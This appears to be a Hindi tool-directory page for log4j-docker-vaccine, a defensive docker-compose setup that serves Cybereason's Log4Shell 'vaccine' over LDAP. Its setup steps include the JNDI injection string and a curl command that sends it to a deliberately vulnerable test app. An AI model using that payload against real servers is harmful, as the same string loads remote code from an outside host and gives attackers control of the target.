Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-docker-vaccine — log4j2 भेद्यता CVE-2021-44228 के लिए एक टीका वातावरण चलाने हेतु docker compose समाधान | Kitploit
उपकरण/GitHubGitHub/jeffbryner/log4j-docker-vaccine
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

log4j2 भेद्यता CVE-2021-44228 के लिए एक टीका वातावरण चलाने हेतु docker compose समाधान

रिपॉजिटरी देखें
24 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4j Docker Vaccine

Cybereason द्वारा पेश किए गए log4j वैक्सीन को चलाने का एक कंटेनरीकृत तरीका

  • https://github.com/Cybereason/Logout4Shell

इसे चलाएँ

इस रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

अपने टारगेट की पहुँच वाला सटीक निजी या सार्वजनिक IP/DNS रखने के लिए containers.env फ़ाइल को संपादित करें। डिफ़ॉल्ट एंट्री संभवतः आपके लिए काम नहीं करेगी!

कंटेनर बनाएँ और चलाएँ:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

अब आपके पास एक सुनने वाला ldap सर्वर है जो एक कमज़ोर log4j इंस्टेंस को इनोक्यूलेट करने के लिए Log4jRCE क्लास सर्व करेगा।

आप चाहें तो ngrok का उपयोग करके इसे इंटरनेट पर एक्सपोज़ कर सकते हैं।

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

आप कुख्यात jndi इनपुट स्ट्रिंग का उपयोग करके एक कमज़ोर log4j इंस्टेंस को इस पर भेज सकते हैं:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

परीक्षण

एक कंटेनर में log4j का जानबूझकर कमज़ोर संस्करण उपलब्ध है:

  • https://github.com/christophetd/log4shell-vulnerable-app

आप इसे शुरू करने और परीक्षण के लिए उपयोग करने हेतु उनके निर्देशों का पालन कर सकते हैं:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

और निम्न के माध्यम से इनोक्यूलेशन ट्रिगर करें:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
टूल डाउनलोड करें